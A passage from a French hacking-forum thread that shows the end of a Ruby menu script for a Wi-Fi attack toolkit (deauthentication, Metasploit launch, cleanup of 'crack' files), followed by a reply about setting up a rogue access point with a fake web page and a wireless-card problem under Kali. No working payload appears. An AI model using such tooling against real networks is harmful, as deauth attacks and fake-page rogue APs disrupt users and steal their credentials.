                menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
                menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
                menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
                menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
                menu.choice(:Settings, "Boite a outils.") { settings() }
                menu.choice(:Quit, "Quitter le prog.") { exit }
              end
            end
          end


          Suivre Hackademics: Twitter, Google+, Facebook.

          Commentaire


          • #6
            Question

            Envoyé par _47 Voir le message
            Ensuite on prend le code de install.rb qu'on copie dans un nouveau fichier nommé install.rb et on le lance:
            Code:
            ruby install.rb
            Bonjour _47 , de qu'elle code install.rb parle tu ? , si j'ai bien compris le code install.rb est le code qui installe ruby et ces extensions , sur kali-linux tout est déja installé ormis la libgtk2-ruby1.8 , si j'ai bien compris dans le cas d'un rogue AP avec fake page , on lance l'option 0 qui va nous installer Apache2 , le dhcp3 etc. , on met notre fake site dans le dossier /var/www/ , et on exécute l'option
            lié au Rogue AP avec Fake Page .

            Au niveau de la pratique , j'ai déja essayé et j'ai un soucis , en effet je suis connecté à une réseau Numericable assez distant je le recoie avec deux barres de connection , sur windows aucun probléme ma carte réseau intégré le gére bien et je suis connecté avec un bon débit et la stabilité du réseau n'est pas mauvaise quand je suis seul dessus . Le probléme c'est que sous kali-linux impossible de me connecter à ce réseau avec ma carte interne ! , le réseau essaye de s'associer mais impossible , je peut juste me connecter avec ma carte awus036h 1000mw , mais celle ci me sert à créer mon rogue AP , je suis plus trop quoi faire et j'ai du mal a comprendre pourquoi ma carte se connecte bien sur windows et pas sur kali.


            Je devrais peut étre transférer se commentaire dans un nouveau sujet afin de faire un truc plus propre ?

            Commentaire

            Chargement...
            X